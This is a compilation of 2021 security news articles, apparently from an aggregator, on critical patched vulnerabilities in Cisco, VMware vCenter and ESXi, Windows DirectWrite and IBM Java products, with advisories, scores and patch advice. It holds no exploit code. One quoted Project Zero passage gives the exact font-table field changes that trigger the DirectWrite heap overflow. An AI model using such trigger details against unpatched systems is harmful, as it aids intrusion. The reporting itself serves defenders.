The bug, tracked as CVE-2021-1388, ranks 10 (out of 10) on the CVSS vulnerability scoring system and stems from an improper token validation in an API endpoint of Cisco ACI MSO installed the Application Services Engine. It affects ACI MSO versions running a 3.0 release of the software.
The ACI Multi-Site Orchestrator lets customers monitor and manage application-access networking policies across Cisco APIC-based devices.
Separately, the company also patched multiple flaws in Cisco Application Services Engine (CVE-2021-1393 and CVE-2021-1396, CVSS score 9.8) that could grant a remote attacker to access a privileged service or specific APIs, resulting in capabilities to run containers or invoke host-level operations, and learn "device-specific information, create tech support files in an isolated volume, and make limited configuration changes."
Both the flaws were a result of insufficient access controls for an API running in the Data Network, Cisco noted.
The networking major said the aforementioned three weaknesses were discovered during internal security testing but added it detected no malicious attempts exploiting the vulnerabilities in the wild.
Lastly, Cisco fixed a vulnerability (CVE-2021-1361, CVSS score 9.8) in the implementation of an internal file management service for Cisco Nexus 3000 Series Switches and Cisco Nexus 9000 Series Switches running NX-OS, the company's network operating system used in its Nexus-branded Ethernet switches.
This could allow a bad actor to create, delete, or overwrite arbitrary files with root privileges on the device, the company cautioned, including permitting the attacker to add a user account without the device administrator's knowledge.
Cisco said Nexus 3000 and Nexus 9000 switches running Cisco NX-OS Software Release 9.3(5) or Release 9.3(6) are vulnerable by default.
"This vulnerability exists because TCP port 9075 is incorrectly configured to listen and respond to external connection requests," Cisco outlined in the adversary. "An attacker could exploit this vulnerability by sending crafted TCP packets to an IP address that is configured on a local interface on TCP port 9075."
The patches come weeks after Cisco rectified as many as 44 flaws in its Small Business routers that could potentially allow an unauthenticated, remote attacker to execute arbitrary code as the root user and even cause a denial-of-service condition.
Cisco Warns of Critical Auth-Bypass Security Flaw
26.2.2021
Vulnerebility
Threatpost
Cisco also stomped out a critical security flaw affecting its Nexus 3000 Series Switches and Cisco Nexus 9000 Series Switches.
A critical vulnerability in Cisco Systems’ intersite policy manager software could allow a remote attacker to bypass authentication.
The vulnerability is one of three critical flaws fixed by Cisco on this week. It exists in Cisco’s ACI Multi-Site Orchestrator (ACI MSO) — this is Cisco’s management software for businesses, which allows them to monitor the health of all interconnected policy-management sites.
The flaw stems from improper token validation on an API endpoint in Cisco’s ACI MSO.
“A successful exploit could allow the attacker to receive a token with administrator-level privileges that could be used to authenticate to the API on affected MSO and managed Cisco Application Policy Infrastructure Controller (APIC) devices,” said Cisco on Wednesday.
Cisco’s Critical Cybersecurity Flaw: Easily Exploitable
The vulnerability
(CVE-2021-1388) ranks 10 (out of 10) on the CVSS vulnerability-rating scale. The
glitch is considered critical because an attacker – without any authentication –
could remotely could exploit it, merely by sending a crafted request to the
affected API.
Affected versions. Credit: Cisco
Cisco said that ACI MSO versions running a 3.0 release of software are affected. However, they would have to be deployed on a Cisco Application Services Engine, which is the company’s unified application hosting platform for deploying data-center applications. ACI MSO can either be deployed as a cluster in Cisco Application Services Engine, or deployed in nodes as virtual machines on a hypervisor.
Cisco said it’s not aware of any public exploits or “malicious use” of the vulnerability thus far. Users can learn about update options by visiting Cisco’s security advisory page.
Cisco Vulnerability Grants Root Privileges on Nexus Switches
Cisco also
stoppered a hole stemming from NX-OS, Cisco’s network operating system for its
Nexus-series Ethernet switches.
The flaw, which has a CVSS score of 9.8 out of 10, could allow an unauthenticated, remote attacker to create, delete or overwrite arbitrary files with root privileges on affected devices. Those affected devices are the Cisco Nexus 3000 Series Switches and Cisco Nexus 9000 Series Switches (in standalone NX-OS mode).
The vulnerability (CVE-2021- 1361) stems from an error on the implementation of an internal file management service. It exists because TCP port 9075 is incorrectly configured to listen and respond to external connection requests.
“An attacker could exploit this vulnerability by sending crafted TCP packets to an IP address that is configured on a local interface on TCP port 9075,” said Cisco. “A successful exploit could allow the attacker to create, delete, or overwrite arbitrary files, including sensitive files that are related to the device configuration.”
In an example scenario, after exploiting the flaw, an attacker could add a user account without the device administrator knowing.
The Nexus 3000 series switches and Nexus 9000 series switches “are vulnerable by default.” Thus, it’s critical for users of these devices to update as soon as possible (for more information on doing so, or to see how they can check if their device is vulnerable, users can check out Cisco’s security advisory).
Cisco Application Services Engine: Unauthorized Access Flaw
Another critical
flaw for Cisco exists in the Application Services Engine. This glitch could
allow unauthenticated, remote attackers to gain privileged access to host-level
operations. From there, they would be able to glean device-specific information,
create diagnostic files and make limited configuration changes.
The flaw (CVE-2021-1393) affects Cisco Application Services Engine Software releases 1.1(3d) and earlier. It ranks 9.8 out of 10 on the CVSS scale.
“The vulnerability is due to insufficient access controls for a service running in the data network,” said Cisco. “An attacker could exploit this vulnerability by sending crafted TCP requests to a specific service. A successful exploit could allow the attacker to have privileged access to run containers or invoke host-level operations.”
More Critical Cisco Fixes
The Cisco flaws are the latest vulnerabilities for
the networking giant to stomp out.
In the beginning of this month, Cisco rolled out fixes for critical holes in its lineup of small-business VPN routers. The flaws could be exploited by unauthenticated, remote attackers to view or tamper with data, and perform other unauthorized actions on the routers.
And in January, Cisco warned of a high-severity flaw in its smart Wi-Fi solution for retailers, which could allow a remote attacker to alter the password of any account user on affected systems. The flaw was part of a number of patches issued by Cisco addressing 67 high-severity CVEs.
Cisco fixes three critical bugs in ACI Multi-Site Orchestrator, Application
Services Engine, and NX-OS
26.2.2021
Vulnerebility
Securityaffairs
Cisco addressed over a dozen vulnerabilities in its products, including three
critical bugs in ACI Multi-Site Orchestrator, Application Services Engine, and
NX-OS software.
Cisco released security updates to address over a dozen
vulnerabilities affecting multiple products, including three critical flaws
impacting its ACI Multi-Site Orchestrator, Application Services Engine, and
NX-OS software.
The most severe vulnerability addressed by the IT giant, tracked as
CVE-2021-1388, is remote bypass authentication issue that affects an API
endpoint of the ACI Multi-Site Orchestrator (MSO). The vulnerability received a
CVSS score of 10.
“A vulnerability in an API endpoint of Cisco ACI Multi-Site
Orchestrator (MSO) installed on the Application Services Engine could allow an
unauthenticated, remote attacker to bypass authentication on an affected
device.” reads the advisory published by Cisco.
“The vulnerability is due to improper token validation on a specific API endpoint. An attacker could exploit this vulnerability by sending a crafted request to the affected API. A successful exploit could allow the attacker to receive a token with administrator-level privileges that could be used to authenticate to the API on affected MSO and managed Cisco Application Policy Infrastructure Controller (APIC) devices.”
The flaw is caused by the improper validation of tokens, an attacker could trigger the issue by sending crafted requests to receive a token with administrator-level privileges that they could be used to authenticate to the API on affected MSO devices.
This flaw affects Cisco ACI Multi-Site Orchestrator (MSO) running software version 3.0 only when deployed on a Cisco Application Services Engine.
Cisco also addressed two unauthorized access vulnerabilities, tracked as CVE-2021-1393 and CVE-2021-1396, that affect the Application Services Engine. The most severe is the CVE-2021-1393, which received a CVSS score of 9.8.
“Multiple vulnerabilities in Cisco Application Services Engine could allow an unauthenticated, remote attacker to gain privileged access to host-level operations or to learn device-specific information, create diagnostic files, and make limited configuration changes.” reads the advisory.
The issues affect only Application Services Engine release 1.1.
Another critical flaw fixed by Cisco is the CVE-2021-1361 flaw that affects the NX-OS running on Nexus 3000 and Nexus 9000 series switches. The flaw received a CVSS score of 9.8, it could be exploited remotely to manipulate arbitrary files with root privileges, without authentication.
“A vulnerability in the implementation of an internal file management service
for Cisco Nexus 3000 Series Switches and Cisco Nexus 9000 Series Switches in
standalone NX-OS mode that are running Cisco NX-OS Software could allow an
unauthenticated, remote attacker to create, delete, or overwrite arbitrary files
with root privileges on the device.” reads the advisory.
“A successful
exploit could allow the attacker to create, delete, or overwrite arbitrary
files, including sensitive files that are related to the device configuration.
For example, the attacker could add a user account without the device
administrator knowing.”
The flaw affects Nexus 3000 series switches and Nexus 9000 series switches, in standalone NX-OS mode, running NX-OS software release 9.3(5) or release 9.3(6).
The good news is that Cisco is not aware of attacks in the wild exploiting these vulnerabilities.
The full list of flaws addressed by the tech company is available on the Cisco’s security portal.
Google discloses technical details of Windows CVE-2021-24093 RCE flaw
26.2.2021
Vulnerebility
Securityaffairs
Google Project Zero team disclosed the details of a recently patched remote code
execution vulnerability (CVE-2021-24093) in Windows Operating system.
White
hat hacker at Google Project Zero disclosed the details of a recently patched
Windows vulnerability, tracked as CVE-2021-24093, that can be exploited for
remote code execution in the context of the DirectWrite client.
DirectWrite is a Windows API designed to provide supports measuring, drawing, and hit-testing of multi-format text.
The vulnerability was discovered by Dominik Röttsches of Google and Mateusz Jurczyk of Google Project Zero, the company reported the issue to Microsoft in November and disclosed this week the details of the issue.
The flaw was addressed with the release of February 2021 Patch Tuesday updates.
The issue affects the Windows graphics component in all operating systems and received a CVSS score of 8.8.
An attacker could exploit the flaw by tricking the victims into visiting a specially crafted site hosting a file set up to trigger the issue.
The CVE-2021-24093 vulnerability is a DirectWrite heap-based buffer overflow that resides in the processing of a specially crafted TrueType font.
“We have discovered a crash in the DWrite!fsg_ExecuteGlyph function when loading and rasterizing a malformed TrueType font with a corrupted “maxp” table. Specifically, it was triggered after changing the value of the maxPoints field from 168 to 0, and the maxCompositePoints value from 2352 to 3 in our test font. We believe that this causes an inadequately small buffer to be allocated from the heap.” reads the report published by Google.
The researchers also released a proof-of-concept (PoC) exploit (poc.ttf poc.html).
Thousands of VMware Center servers exposed online and potentially vulnerable to
CVE-2021-21972 flaw
26.2.2021
Vulnerebility
Securityaffairs
A Chinese security researcher published a PoC code for the CVE-2021-21972
vulnerability in VMware Center, thousands of vulnerable servers are exposed
online.
A Chinese security researcher published the Proof-of-concept exploit
code for the CVE-2021-21972 RCE vulnerability affecting VMware vCenter servers.
vCenter Server is the centralized management utility for VMware, and is used to manage virtual machines, multiple ESXi hosts, and all dependent components from a single centralized location.
The flaw could be exploited by remote, unauthenticated attackers without user interaction.
“The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.” reads the advisory published. “A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. “
The issue affects vCenter Server plugin for vROPs which is available in all default installations. vROPs does not need be present to have this endpoint available. The virtualization giant has provided workarounds to disable it.
Shortly after the publication of the flaw, experts from security firm Bad
Packets started observing online scanning for vulnerable servers.
At the time of this writing, querying the Shodan search engine it is possible to
find more than 6,700 potentially vulnerable VMware vCenter servers that are
exposed online.
The CVE-2021-21972 flaw was reported by Mikhail Klyuchnikov
from Positive Technologies, it has received a CVSSv3 base score of 9.8/ 10
according to VMware’s security advisory.
Positive Technologies published a detailed analysis for this vulnerability to share knowledge about potential compromises resulting from the exploitation of this issue.
Experts from Positive Technologies decided to avoid publishing the PoC code for this issue because of the large number of installs exposed online that have yet to be patched.
Unfortunately, ZDNet reported the availability of other easy-to-use proof-of-concept codes, exposing the organization to the risk of hack.
Experts warn of the risks that cybercrime organizations could hit vulnerable installs to compromise their networks and conduct several malicious activities, including the deployment of ransomware.
Darkside and RansomExx ransomware operators were observed targeting VMware infrastructure in the last months.
Cisco Patches Severe Flaws in Network Management Products, Switches
26.2.2021
Vulnerebility
Securityweek
Cisco this week released patches for over a dozen vulnerabilities affecting multiple products, including three critical bugs impacting its ACI Multi-Site Orchestrator, Application Services Engine, and NX-OS software.
The most severe of these issues is a flaw in an API endpoint of ACI Multi-Site Orchestrator (MSO), which could allow a remote attacker to bypass authentication. The vulnerability is tracked as CVE-2021-1388 and features a CVSS score of 10.
Due to the improper validation of tokens, an attacker could send crafted requests to receive a token with administrator-level privileges that they could then use to authenticate to the API on affected MSO devices.
According to Cisco, ACI MSO running software version 3.0 is vulnerable, but only if deployed on an Application Services Engine (it can also be deployed as VMs on a hypervisor).
Cisco also addressed two unauthorized access bugs in Application Services Engine, namely CVE-2021-1393 and CVE-2021-1396, but only the former has a severity rating of critical (CVSS score 9.8). An attacker could exploit these bugs to gain privileged access to host-level operations, access device information, modify configurations, or create diagnostic files.
Due to insufficient access controls in the Data Network, an attacker could access a privileged service by exploiting CVE-2021-1393, or could access a specific API when exploiting CVE-2021-1396. Only Application Services Engine release 1.1 is vulnerable and no workarounds exist for these bugs.
Also featuring a CVSS score of 9.8, the third critical flaw that Cisco patched this week (CVE-2021-1361) affects Nexus 3000 and Nexus 9000 series switches. Affecting the NX-OS software, the issue could be exploited remotely to manipulate arbitrary files with root privileges, without authentication.
“A successful exploit could allow the attacker to create, delete, or overwrite arbitrary files, including sensitive files that are related to the device configuration. For example, the attacker could add a user account without the device administrator knowing,” Cisco explains.
Nexus 3000 series switches and Nexus 9000 series switches in standalone NX-OS mode are affected, if they are running NX-OS software release 9.3(5) or release 9.3(6).
Cisco says it is not aware of these vulnerabilities being exploited in the wild and advises customers to install the released patches as soon as possible.
Two high-severity issues that Cisco patched in NX-OS software this week could lead to cross-site request forgery (CSRF) and denial-of-service (DoS), while two others patched in Nexus 9000 series fabric switches could lead to unauthorized access to the infrastructure VLAN, or to DoS, respectively.
Cisco also addressed several medium-severity flaws in the FXOS and NX-OS software, Nexus 9000 series fabric switches, and AnyConnect Secure Mobility Client. A DoS issue in AnyConnect Secure Mobility Client remains under investigation with no workarounds available, Cisco says.
Details on all of these security bugs can be found on Cisco’s security portal.
Hackers Scanning for VMware vCenter Servers Affected by Critical Vulnerability
26.2.2021
Vulnerebility
Securityweek
Just one day after VMware announced the availability of patches for a critical vulnerability affecting vCenter Server, hackers have started scanning the internet for vulnerable servers.
The flaw, tracked as CVE-2021-21972, affects the vSphere Client component of vCenter Server and it can be exploited by a remote, unauthenticated attacker to execute arbitrary commands with elevated privileges on the operating system that hosts vCenter Server.
While in most cases an attacker would need to have access to the targeted organization’s network in order to exploit the vulnerability, there are over 6,000 potentially vulnerable systems that are accessible directly from the internet.
Many of these servers are located in the United States, Germany, China, France and the United Kingdom.
Cybersecurity firm Positive Technologies, whose researchers discovered the flaw and reported it to VMware, has released technical details for the vulnerability after seeing that several individuals had released proof-of-concept (PoC) exploit code shortly after the virtualization giant announced the availability of patches.
VMware published its advisory on February 23, and threat intelligence company Bad Packets reported on February 24 that it had already detected “mass scanning activity” targeting vCenter servers affected by CVE-2021-21972.
Mikhail Klyuchnikov, the Positive Technologies researcher credited for finding the vulnerability, said this flaw is just as dangerous as a widely exploited Citrix vulnerability tracked as CVE-2019-19781.
“If the vulnerable software can be accessed from the Internet, this will allow an external attacker to penetrate the company's external perimeter and also gain access to sensitive data,” he explained.
VMWare Patches Critical RCE Flaw in vCenter Server
25.2.2021
Vulnerebility
Threatpost
The vulnerability, one
of three patched by the company this week, could allow threat actors to breach
the external perimeter of a data center or leverage backdoors already installed
to take over a system.
Threatpost Webinar February Promo
Click to Register
VMware has patched three vulnerabilities in its virtual-machine infrastructure for data centers, the most serious of which is a remote code execution (RCE) flaw in its vCenter Server management platform. The vulnerability could allow attackers to breach the external perimeter of an enterprise data center or leverage backdoors already installed on a system to find other vulnerable points of network entry to take over affected systems.
Positive Technologies researcher Mikhail Klyuchnikov discovered two of the flaws in vCenter Server, the centralized management and automation platform for VMware’s vSphere virtualization platform, which—given VMware’s dominant position in the market—is used by the majority of enterprise data centers. Among its duties, vCenter Server manages virtual machines, multiple ESXi hypervisor hosts and other various dependent components from a central management dashboard.
Where the VMware Flaws Were Found, What’s Effected?
The researcher found the
most critical of the flaws, which is being tracked as CVE-2021-21972 and has a
CVSS v3 score of 9.8, in a vCenter Server plugin for vROPs in the vSphere Client
functionality, according to an advisory posted online Tuesday by VMware.
“A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server,” the company said.
The plugin is available in all default installations—potentially giving attackers a wide attack surface–and vROPs need not be present to have this endpoint available, according to VMware.
The main threat in terms of exploiting the vulnerability comes from insiders who have penetrated the protection of the network perimeter using other methods–such as social engineering or web vulnerabilities–or have access to the internal network using previously installed backdoors, according to Positive Technologies.
Klyuchnikov said the VMware flaw poses “no less threat” than a notoriously easy-to-exploit Citrix RCE vulnerability, CVE-2019-19781, which was discovered two years ago affecting more than 25,000 servers globally. It is especially dangerous because “it can be used by any unauthorized user,” he said.
“The error allows an unauthorized user to send a specially crafted request, which will later give them the opportunity to execute arbitrary commands on the server,” Klyuchnikov explained. “After receiving such an opportunity, the attacker can develop this attack, successfully move through the corporate network, and gain access to the data stored in the attacked system, such as information about virtual machines and system users.”
How is CVE-2021-21972 Exploited?
In the case in which vulnerable software can
be accessed from the internet, an external attacker can break into a company’s
external perimeter and also gain access to sensitive data, he added. This
scenario is highly likely based on previous pentests executed by Positive
Technologies, which allowed researchers to breach the network perimeter and gain
access to local network resources in 93 percent of companies, according to the
company.
Another flaw patched by VMware in the update also has potential for remote code execution and affects the hypervisor VMware ESXi , the company said. CVE-2021-21974, with a CVSSv3 base score of 8.9. is a heap-overflow vulnerability in the OpenSLP component as used in an ESXi host.
A threat actor who’s already inside the same network segment as an ESXi host and has access to port 427 can use the vulnerability to trigger the heap-overflow issue in the OpenSLP service, resulting in remote code execution, according to VMware.
The other flaw Klyuchnikov discovered—tracked as CVE-2021-21973 and the least serious of the three–is a Server Side Request Forgery (SSRF) vulnerability due to improper validation of URLs in a vCenter Server plugin with a CVSS score of 5.3, according to VMWare. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure,” the company said.
Unauthorized users can use the flaw to send requests as the targeted server to help threat actors develop further attacks. Used in combination with the other vulnerabilities, attackers could leverage it to scan the company’s internal network and obtain information about the open ports of various services, Klyuchnikov said.
What VMware is Recommending for a Fix to the Data Center Bugs?
VMware advised
customers to install all updates provided to affected deployments to remediate
the threat the vulnerabilities pose. The company also provided workarounds for
those who can’t immediately update their systems.
Positive Technologies also recommended that companies affected who have vCenter Server interfaces on the perimeter of their organizations remove them, and also allocate the interfaces to a separate VLAN with a limited access list in the internal network, the company said.
Google Discloses Details of Remote Code Execution Vulnerability in Windows
25.2.2021
Vulnerebility
Securityweek
Google’s cybersecurity research unit Project Zero on Wednesday disclosed the details of a recently patched Windows vulnerability that can be exploited for remote code execution.
The flaw, tracked as CVE-2021-24093, was patched by Microsoft on February 9 with its Patch Tuesday updates. Dominik Röttsches of Google and Mateusz Jurczyk of Google Project Zero have been credited for reporting the issue to Microsoft.
A CVSS score of 8.8 has been assigned to the vulnerability, but Microsoft has rated it critical for all affected operating systems. The list includes Windows 10, Windows Server 2016 and 2019, and Windows Server.
According to Microsoft, the security hole impacts a Windows graphics component and it can be exploited by luring the targeted user to a website hosting a specially crafted file set up to exploit the flaw.
The Google researchers reported the vulnerability to Microsoft in late November and the bug report was made public on Wednesday, roughly two weeks after Microsoft released a patch.
Jurczyk and Röttsches described CVE-2021-24093 as a DirectWrite heap-based buffer overflow related to the processing of a specially crafted TrueType font. They explained that an attacker can trigger a memory corruption condition that can be leveraged to execute arbitrary code in the context of the DirectWrite client. DirectWrite is a Windows API designed for high-quality text rendering.
The researchers tested their exploit on a fully patched Windows 10 in all major browsers. In addition to technical details, they released a proof-of-concept (PoC) exploit.
However, based on its exploitability assessment, Microsoft does not believe the vulnerability will be exploited in the wild.
Critical VMware vCenter Server Flaw Can Expose Organizations to Remote Attacks
25.2.2021
Vulnerebility
Securityweek
VMware on Tuesday informed customers that its vCenter Server product is affected by a critical vulnerability that can be exploited by an attacker to execute commands with elevated privileges.
vCenter Server is a management software designed to provide a centralized platform for controlling VMware vSphere environments. The critical vulnerability, discovered by Positive Technologies researcher Mikhail Klyuchnikov, impacts a vCenter Server plugin used by the vSphere Client.
The flaw, tracked as CVE-2021-21972 with a CVSS score of 9.8, can be exploited by an attacker with network access to port 443 to “to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server,” VMware said in its advisory.
According to Positive Technologies, while 90 percent of vCenter devices are only accessible from within an organization’s perimeter — exploitation of the vulnerability in this case requires access to the target’s internal network — there are more than 6,000 systems that are accessible directly from the internet.
The cybersecurity firm said more than a quarter of these devices are located in the United States, followed by Germany (7%), France (6%), China (6%), the UK (4%), Canada (4%), Russia (3%), Taiwan (3%), Iran (3%), and Italy (3%).
“In our opinion, the RCE vulnerability in the vCenter Server can pose no less a threat than the infamous vulnerability in Citrix (CVE-2019-19781),” Positive Technologies’ Klyuchnikov explained. “The error allows an unauthorized user to send a specially crafted request, which will later give them the opportunity to execute arbitrary commands on the server.”
He added, “After receiving such an opportunity, the attacker can develop this attack, successfully move through the corporate network, and gain access to the data stored in the attacked system (such as information about virtual machines and system users). If the vulnerable software can be accessed from the Internet, this will allow an external attacker to penetrate the company's external perimeter and also gain access to sensitive data. Once again, I would like to note that this vulnerability is dangerous, as it can be used by any unauthorized user.”
Klyuchnikov has also been credited for a medium-severity server-side request forgery (SSRF) flaw in vCenter Server, specifically in a plugin used by the vSphere Client. An attacker with network access to port 443 could exploit this vulnerability to obtain information — including on open ports associated with various services — that could be useful for further attacks.
VMware has also informed users about CVE-2021-21974, a high-severity heap overflow in ESXi that can be exploited by an attacker with network access to port 427 to execute arbitrary code.
The issue was reported to VMware by Lucas Leong of Trend Micro's Zero Day Initiative (ZDI). ZDI has yet to make its own advisory for this vulnerability public.
VMware has released patches and workarounds for each of the affected products and versions.
It’s important that organizations using affected products apply the patches or workarounds since VMware product vulnerabilities being targeted by threat actors is not unheard of. The NSA warned recently that a state-sponsored threat actor linked to Russia had exploited a flaw in VMware Workspace ONE, likely even before a patch was released by the virtualization giant.
Critical RCE Flaws Affect VMware ESXi and vSphere Client — Patch Now
25.2.2021
Vulnerebility
Thehackernews
VMware has addressed
multiple critical remote code execution (RCE) vulnerabilities in VMware ESXi and
vSphere Client virtual infrastructure management platform that may allow
attackers to execute arbitrary commands and take control of affected systems.
"A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server," the company said in its advisory.
The vulnerability, tracked as CVE-2021-21972, has a CVSS score of 9.8 out of a maximum of 10, making it critical in severity.
"In our opinion, the RCE vulnerability in the vCenter Server can pose no less a threat than the infamous vulnerability in Citrix (CVE-2019-19781)," said Positive Technologies' Mikhail Klyuchnikov, who discovered and reported the flaw to VMware.
"The error allows an unauthorized user to send a specially crafted request, which will later give them the opportunity to execute arbitrary commands on the server."
With this access in place, the attacker can then successfully move through the corporate network and gain access to the data stored in the vulnerable system, such as information about virtual machines and system users, Klyuchnikov noted.
Separately, a second vulnerability (CVE-2021-21973, CVSS score 5.3) allows unauthorized users to send POST requests, permitting an adversary to mount further attacks, including the ability to scan the company's internal network and retrieve specifics about the open ports of various services.
The information disclosure issue, according to VMware, stems from an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in the vCenter Server plugin.
VMware has also provided workarounds to remediate CVE-2021-21972 and
CVE-2021-21973 temporarily until the updates can be deployed. Detailed steps can
be found here.
It's worth noting that VMware rectified a command injection vulnerability in its vSphere Replication product (CVE-2021-21976, CVSS score 7.2) earlier this month that could grant a bad actor with administrative privileges to execute shell commands and achieve RCE.
Lastly, VMware also resolved a heap-overflow bug (CVE-2021-21974, CVSS score 8.8) in ESXi's service location protocol (SLP), potentially allowing an attacker on the same network to send malicious SLP requests to an ESXi device and take control of it.
OpenSLP provides a framework to allow networking applications to discover the existence, location, and configuration of networked services in enterprise networks.
The latest fix for ESXi OpenSLP comes on the heels of a similar patch (CVE-2020-3992) last November that could be leveraged to trigger a use-after-free in the OpenSLP service, leading to remote code execution.
Not long after, reports of active exploitation attempts emerged in the wild, with ransomware gangs abusing the vulnerability to take over unpatched virtual machines deployed in enterprise environments and encrypt their virtual hard drives.
It's highly recommended that users install the updates to eliminate the risk associated with the flaws, in addition to "removing vCenter Server interfaces from the perimeter of organizations, if they are there, and allocate them to a separate VLAN with a limited access list in the internal network."
IBM Squashes Critical Remote Code-Execution Flaw
24.2.2021 Vulnerebility Threatpost
A critical-severity buffer-overflow flaw that affects IBM Integration Designer could allow remote attackers to execute code.
IBM has patched a critical buffer-overflow error that affects Big Blue’s Integration Designer toolset, which helps enterprises create business processes that integrate applications and data. If exploited, the flaw could enable remote code execution.
The flaw (CVE-2020-27221) has a CVSS base score of 9.8 out of 10, making it critical in severity. It stems from an issue in versions 7 and 8 of Java Runtime Environment (JRE), which is used by IBM Integration Designer toolset.
JRE is a software layer that runs on top of a computer’s operating system (OS), and enables Java to run seamlessly on any system regardless of its OS.
What is a Buffer-Overflow Flaw?
The flaw is a stack-based buffer-overflow
error. This is a class of vulnerability where the region of a process’ memory
that’s used to store dynamic variables (the heap) can be overwhelmed.
“By sending an overly long string, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash,” according to IBM’s Monday security advisory.
The error exists when the virtual machine (VM) or Java Native Interface converts characters from UTF-8 to platform encoding. Java Native Interface is a programming framework that enables Java code running in a Java VM to call native applications and libraries written in other languages.
IBM didn’t provide further information about what type of privileges an attacker would need, where they would need to send the string or the initial attack vector.
IBM Integration Designer Affected
Specifically, CVE-2020-27221 exists in
Eclipse OpenJ9, a high-performance, scalable, Java VM implementation that is
fully compliant with JRE.
“Contributed to the Eclipse foundation by IBM, the OpenJ9 JVM underpins the IBM SDK, Java Technology Edition, which is a core component of many IBM Enterprise software products,” according to IBM.
IBM Integration Designer versions 8.5.7, 19.0.0.2, 20.0.0.1 and 20.0.0.2, which use JRE versions 7 and 8, are affected. The vulnerability was first reported on Dec. 16 via the Eclipse Foundation, which is a global community of Eclipse open source software development members. A fix can be found here for each affected version of IBM Integration Designer.
Another vulnerability (CVE-2020-14782) was fixed, stemming from the JRE implementation in IBM Integration Designer. This “unspecified” vulnerability existed in Java SE and was related to the Libraries component. However, according to IBM it had “no confidentiality impact, low integrity impact and no availability impact.”
IBM Planning Analytics Workspace High-Severity Flaws
IBM also patched a slew
of high-severity flaws in its IBM Planning Analytics Workspace; a web-based
interface for IBM Planning Analytics that provides an interface to create and
analyze content. The flaws exist specifically in Release 61 of the Local v2.0
for Planning Analytics Workspace.
Three vulnerabilities exist in Node.js, an open-source, cross-platform JavaScript runtime environment for developing server-side and networking applications, which is used in IBM Planning Analytics. These flaws include a denial-of-service vulnerability (CVE-2020-8251); an HTTP request-smuggling glitch (CVE-2020-8201); and a buffer-overflow error (CVE-2020-8252).
Another flaw (CVE-2020-25649) exists in the FasterXML Jackson Databind, used to convert JSON to and from Plain Old Java Object (POJO) using property accessor or using annotations.
The flaw “could provide weaker than expected security, caused by not having entity expansion secured properly,” according to IBM. “A remote attacker could exploit this vulnerability to launch XML external entity (XXE) attacks to have impact over data integrity.”
IBM Continues Security-Flaw Fix Campaign
IBM previously issued various fixes
for vulnerabilities, including ones in Spectrum Protect Plus in September. This
is Big Blue’s security tool that’s found under the umbrella of its Spectrum data
storage software branding. The flaws could be exploited by remote attackers to
execute code on vulnerable systems.
In August, a shared-memory flaw was discovered in IBM’s next-gen data-management software that researchers said could lead to other threats — as demonstrated by a new proof-of-concept exploit for the bug.
And in April, four serious security vulnerabilities in the IBM Data Risk Manager (IDRM) were identified that can lead to unauthenticated remote code execution (RCE) as root in vulnerable versions, according to analysis – and a proof-of-concept exploit is available.
VMware addresses a critical RCE issue in vCenter Server
24.2.2021
Vulnerebility
Securityaffairs
VMware addressed a critical remote code execution flaw, tracked as
CVE-2021-21972, in vCenter Server virtual infrastructure management platform.
VMware has addressed a critical remote code execution (RCE) vulnerability in the
vCenter Server virtual infrastructure management platform, tracked as
CVE-2021-21972, that could be exploited by attackers to potentially take control
of affected systems.
vCenter Server is the centralized management utility for VMware, and is used to manage virtual machines, multiple ESXi hosts, and all dependent components from a single centralized location.
The flaw could be exploited by remote, unauthenticated attackers without user interaction.
“The vSphere Client (HTML5) contains a remote code execution vulnerability in a
vCenter Server plugin. VMware has evaluated the severity of this issue to be in
the Critical severity range with a maximum CVSSv3 base score of 9.8.” reads the
advisory published. “A malicious actor with network access to port 443 may
exploit this issue to execute commands with unrestricted privileges on the
underlying operating system that hosts vCenter Server. “
The CVE-2021-21972
issue was reported by Mikhail Klyuchnikov from Positive Technologies, it has
received a CVSSv3 base score of 9.8/ 10 according to VMware’s security advisory.
The issue affects vCenter Server plugin for vROPs which is available in all default installations. vROPs does not need be present to have this endpoint available. The virtualization giant has provided workarounds to disable it.
The company recommends upgrading vulnerable vCenter Server installs to versions 6.5 U3n, 6.7 U3l, or 7.0 U1c as soon as possible.
VMware also provides step-by-step Workaround Instructions for CVE-2021-21972 and CVE-2021-21973 (KB82374 support document).
VMware also addressed an important heap-overflow flaw, tracked as CVE-2021-21974, in VMware ESXi. The issue can be exploited by attackers to execute arbitrary code remotely on vulnerable devices.
IBM addressed flaws in Java Runtime, Planning Analytics Workspace, Kenexa LMS
24.2.2021
Vulnerebility
Securityaffairs
IBM has released security patches to address high- and medium-severity
vulnerabilities impacting some of its enterprise solutions.
IBM has released
security updates to address several high- and medium-severity flaws affecting
some of its enterprise products, including IBM Java Runtime, IBM Planning
Analytics Workspace, and IBM Kenexa LMS On Premise.
Two issues, tracked as CVE-2020-14782 and CVE-2020-27221, affect Runtime
Environment Java 7 and 8 which is used in IBM Integration Designer.
IBM
Integration Designer is a complete authoring environment that you use for
end-to-end integration in your service-oriented architecture (SOA). Based on
Eclipse, Integration Designer is a tool for building SOA-based business process
management and integration solutions across Business Automation Workflow and
WebSphere Adapters.
The most severe issue, tracked as CVE-2020-27221, is a stack-based buffer overflow that resides in Eclipse OpenJ9. The issue could be used by remote attackers to execute arbitrary code or cause an application crash.
“Eclipse OpenJ9 is vulnerable to a stack-based buffer overflow when the virtual machine or JNI natives are converting from UTF-8 characters to platform encoding. By sending an overly long string, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash.” reads the advisory.
The vulnerability received a CVSS base score of 9.8.
The CVE-2020-14782 flaw affects the Java SE’s library component that could be exploited by attackers to compromise Java SE via multiple protocols.
“An unspecified vulnerability in Java SE related to the Libraries component could allow an unauthenticated attacker to cause no confidentiality impact, low integrity impact, and no availability impact.” reads the advisory published by IBM.
